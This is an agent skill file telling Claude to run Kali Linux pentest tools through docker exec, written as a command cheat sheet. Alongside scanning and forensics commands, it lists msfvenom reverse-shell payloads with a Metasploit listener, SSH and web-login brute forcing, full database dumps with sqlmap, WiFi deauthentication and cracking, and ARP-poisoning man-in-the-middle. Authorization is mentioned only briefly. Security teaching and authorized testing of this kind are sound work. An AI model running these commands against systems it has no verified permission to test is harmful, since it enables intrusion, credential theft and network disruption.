kali-docker-pentesting

Comprehensive pentesting toolkit using Kali Linux Docker container. Provides direct access to 200+ security tools without MCP overhead. Use when conducting security assessments, penetration testing, vulnerability scanning, or security research. Works via direct docker exec commands for maximum efficiency.

kroegha 20 11 Updated 6mo ago

GitHub

Install

npx skillscat add kroegha/kali-docker-pentesting

Install via the SkillsCat registry.

SKILL.md

Kali Docker Pentesting Skill

Overview

This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.

Container Management

Starting the Container

# Basic start
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -v $(pwd)/results:/results \
  kali-comprehensive

# With network capabilities (for actual scanning)
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -v $(pwd)/results:/results \
  --cap-add=NET_RAW \
  --cap-add=NET_ADMIN \
  --network host \
  kali-comprehensive

# With GUI access (VNC)
docker run -d --name kali \
  -v $(pwd)/workspace:/workspace \
  -p 5900:5900 \
  -p 3389:3389 \
  kali-comprehensive

Running Commands

# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Copy files out
docker cp kali:/results/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/workspace/

Container Lifecycle

# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali

Tool Catalog

🔍 Network Discovery & Scanning

nmap - Network Mapper

Description: Industry-standard network scanner for host discovery, port scanning, and service detection.

Usage:

# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results
docker exec kali nmap -sV -oA /results/scan 192.168.1.0/24

Common Options:

-sS - SYN stealth scan
-sT - TCP connect scan
-sU - UDP scan
-sV - Version detection
-O - OS detection
-A - Aggressive scan (OS, version, scripts, traceroute)
-p- - Scan all 65535 ports
-Pn - Skip ping (assume host is up)
-T4 - Faster timing (0-5)
-oA - Output all formats

masscan - Fast Port Scanner

Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.

Usage:

# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /results/masscan.txt

netdiscover - Network Discovery

Description: Active/passive ARP reconnaissance tool.

Usage:

# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24

arp-scan - ARP Scanner

Description: Discovers IPv4 hosts using ARP.

Usage:

docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24

🌐 Web Application Testing

nikto - Web Server Scanner

Description: Web server vulnerability scanner.

Usage:

# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde

dirb - Directory Brute Forcer

Description: Web content scanner.

Usage:

# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /results/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt

gobuster - Directory/DNS Enumeration

Description: Fast directory and DNS enumeration tool.

Usage:

# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt

wfuzz - Web Fuzzer

Description: Web application fuzzer.

Usage:

# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ

# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login

sqlmap - SQL Injection Tool

Description: Automatic SQL injection and database takeover tool.

Usage:

# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all

wpscan - WordPress Scanner

Description: WordPress vulnerability scanner.

Usage:

# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe

whatweb - Website Fingerprinting

Description: Identifies websites and web technologies.

Usage:

# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /workspace/urls.txt

🔐 Password Attacks

john - John the Ripper

Description: Fast password cracker.

Usage:

# Crack with default wordlist
docker exec kali john /workspace/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /workspace/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /workspace/hashes.txt

# Show cracked passwords
docker exec kali john --show /workspace/hashes.txt

# Incremental mode
docker exec kali john --incremental /workspace/hashes.txt

hashcat - Advanced Password Recovery

Description: World's fastest password cracker.

Usage:

# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

# Show results
docker exec kali hashcat -m 0 hashes.txt --show

Hash Modes:

0 = MD5
100 = SHA1
1400 = SHA256
1700 = SHA512
1000 = NTLM
3200 = bcrypt

hydra - Network Password Cracker

Description: Fast network logon cracker.

Usage:

# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http

medusa - Parallel Password Cracker

Description: Speedy, parallel, modular login brute-forcer.

Usage:

# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http

crunch - Wordlist Generator

Description: Generates custom wordlists.

Usage:

# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /results/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /results/numbers.txt

# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /results/pattern.txt

📡 Wireless Security

aircrack-ng - WiFi Security Suite

Description: Complete suite for assessing WiFi network security.

Usage:

# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap

wifite - Automated Wireless Attack

Description: Automated wireless attack tool.

Usage:

# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific target
docker exec kali wifite -i wlan0 --kill

reaver - WPS Attack

Description: Brute force WPS PINs.

Usage:

docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

🕵️ Information Gathering

theharvester - Email/Subdomain Harvester

Description: Gather emails, subdomains, IPs from public sources.

Usage:

# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /results/harvest

dnsrecon - DNS Enumeration

Description: DNS enumeration and network reconnaissance.

Usage:

# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt

sublist3r - Subdomain Enumeration

Description: Fast subdomain enumeration using OSINT.

Usage:

# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /results/subdomains.txt

enum4linux - SMB Enumeration

Description: Tool for enumerating information from Windows and Samba systems.

Usage:

# Full enumeration
docker exec kali enum4linux -a 192.168.1.1

# User enumeration
docker exec kali enum4linux -U 192.168.1.1

# Share enumeration
docker exec kali enum4linux -S 192.168.1.1

dmitry - Deep Information Gathering

Description: Deepmagic Information Gathering Tool.

Usage:

# Full scan
docker exec kali dmitry -winsepo /results/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com

🛡️ Exploitation Frameworks

metasploit-framework - Penetration Testing Framework

Description: The world's most used penetration testing framework.

Usage:

# Start msfconsole
docker exec -it kali msfconsole

# Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /results/payload.exe

# Search exploits
docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q"

# Run resource script
docker exec kali msfconsole -r /workspace/script.rc

Common msfvenom payloads:

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk

social-engineer-toolkit (SET)

Description: Social engineering penetration testing framework.

Usage:

# Start SET
docker exec -it kali setoolkit

🔬 Forensics & Analysis

binwalk - Firmware Analysis

Description: Analyze and extract firmware images.

Usage:

# Scan for embedded files
docker exec kali binwalk /workspace/firmware.bin

# Extract files
docker exec kali binwalk -e /workspace/firmware.bin

# Signature scan
docker exec kali binwalk --signature /workspace/file.bin

foremost - File Carving

Description: Recover files based on headers and footers.

Usage:

# Recover all file types
docker exec kali foremost -i /workspace/image.dd -o /results/recovered

# Specific file types
docker exec kali foremost -t jpg,png,pdf -i /workspace/image.dd -o /results/

volatility - Memory Forensics

Description: Advanced memory forensics framework.

Usage:

# Get image info
docker exec kali volatility -f /workspace/memory.dump imageinfo

# List processes
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /results/

strings - Extract Strings

Description: Extract printable strings from files.

Usage:

# Basic extraction
docker exec kali strings /workspace/binary > /results/strings.txt

# Minimum length 10
docker exec kali strings -n 10 /workspace/binary

# Unicode strings
docker exec kali strings -e l /workspace/binary

exiftool - Metadata Extraction

Description: Read and write meta information in files.

Usage:

# View metadata
docker exec kali exiftool /workspace/image.jpg

# Remove all metadata
docker exec kali exiftool -all= /workspace/image.jpg

# Batch process
docker exec kali exiftool /workspace/*.jpg

🔄 Reverse Engineering

ghidra - Software Reverse Engineering

Description: NSA's software reverse engineering framework.

Usage:

# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode
docker exec kali analyzeHeadless /workspace /project -import /workspace/binary.exe

radare2 - Reverse Engineering Framework

Description: Advanced reverse engineering framework.

Usage:

# Open binary
docker exec -it kali r2 /workspace/binary

# Analyze
docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /workspace/binary"

# Disassemble
docker exec kali r2 -c 'pd 10' /workspace/binary

gdb - GNU Debugger

Description: Standard debugger for Unix systems.

Usage:

# Debug binary
docker exec -it kali gdb /workspace/binary

# With PEDA
docker exec -it kali gdb -q /workspace/binary

🎯 Vulnerability Assessment

lynis - Security Auditing

Description: Security auditing tool for Unix/Linux systems.

Usage:

# Full audit
docker exec kali lynis audit system

# Quick scan
docker exec kali lynis audit system --quick

nikto - Web Vulnerability Scanner

(See Web Application Testing section)

openvas - Vulnerability Scanner

Description: Full-featured vulnerability scanner.

Usage:

# Start OpenVAS (requires initialization)
docker exec kali openvas-start

📊 Network Analysis

tcpdump - Packet Capture

Description: Command-line packet analyzer.

Usage:

# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /results/capture.pcap

# Read file
docker exec kali tcpdump -r /results/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'

tshark - Network Protocol Analyzer

Description: Terminal-based Wireshark.

Usage:

# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /results/capture.pcap

# Filter display
docker exec kali tshark -r /results/capture.pcap -Y 'http.request'

ettercap - Network Sniffer/Interceptor

Description: Comprehensive suite for MITM attacks.

Usage:

# Text mode
docker exec -it kali ettercap -T -i eth0

# ARP poisoning
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//

Common Pentesting Workflows

1. Network Reconnaissance

# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /results/hosts

# Step 2: Port scan discovered hosts
docker exec kali nmap -sV -p- -iL /results/hosts.txt -oA /results/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /results/services

2. Web Application Assessment

# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /results/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /results/nikto.txt

# Step 4: Test for SQLi
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch

3. Password Cracking Workflow

# Step 1: Generate wordlist
docker exec kali crunch 8 12 -t Pass@@@@ -o /results/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/results/wordlist.txt /workspace/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /workspace/users.txt -P /results/wordlist.txt ssh://192.168.1.1

4. Wireless Network Assessment

# Step 1: Enable monitor mode
docker exec kali airmon-ng start wlan0

# Step 2: Scan networks
docker exec kali airodump-ng wlan0mon

# Step 3: Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon

# Step 4: Deauth clients
docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Step 5: Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap

5. Exploitation Workflow

# Step 1: Search for exploit
docker exec kali searchsploit apache 2.4.49

# Step 2: Generate payload
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe

# Step 3: Setup listener in Metasploit
docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"

File Management

Copying Files Between Host and Container

# Copy TO container
docker cp ./local-file.txt kali:/workspace/

# Copy FROM container
docker cp kali:/results/scan.txt ./output/

# Copy directory
docker cp kali:/results/ ./output/

Working with Wordlists

Common Wordlist Locations:

/usr/share/wordlists/rockyou.txt - Most popular password list
/usr/share/wordlists/dirb/common.txt - Common directories
/usr/share/seclists/ - SecLists collection
/usr/share/wordlists/metasploit/ - Metasploit wordlists

# List available wordlists
docker exec kali find /usr/share/wordlists -type f

# Extract rockyou (if gzipped)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

Troubleshooting

Container Won't Start

# Check logs
docker logs kali

# Remove and recreate
docker rm kali
docker run -d --name kali kali-comprehensive

Network Issues

# Use host network
docker run -d --name kali --network host kali-comprehensive

# Add network capabilities
docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive

Permission Issues

# Run as root (already default)
docker exec -u root kali [command]

# Fix workspace permissions
docker exec kali chmod -R 777 /workspace /results

Metasploit Database Issues

# Initialize database
docker exec kali service postgresql start
docker exec kali msfdb init

# Check status
docker exec kali msfdb status

Best Practices

1. Always Save Results

# Use output flags
-o filename.txt          # Generic output
-oA basename            # Nmap: all formats
-w filename             # Write to file
> /results/output.txt   # Shell redirect

2. Use Volumes for Persistence

Mount volumes for:

/workspace - Working files
/results - Scan results
/wordlists - Custom wordlists

3. Scope Your Testing

Always:

Get written authorization
Define scope boundaries
Document everything
Report findings responsibly

4. Clean Up After Testing

# Stop monitor mode
docker exec kali airmon-ng stop wlan0mon

# Clear temporary files
docker exec kali rm -rf /tmp/*

# Archive results
docker exec kali tar -czf /results/assessment-$(date +%Y%m%d).tar.gz /results/*.txt

Quick Reference

Port Scanning

docker exec kali nmap -sV -p- target

Directory Enumeration

docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

SQL Injection

docker exec kali sqlmap -u "http://target/page?id=1" --batch

Password Cracking

docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Network Brute Force

docker exec kali hydra -l admin -P passwords.txt ssh://target

WiFi Cracking

docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

When to Use This Skill

Use this skill when:

Conducting authorized penetration testing
Performing security assessments
Testing network security
Analyzing web applications
Cracking passwords (authorized)
Wireless security auditing
Forensics analysis
Reverse engineering
Learning security techniques

Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.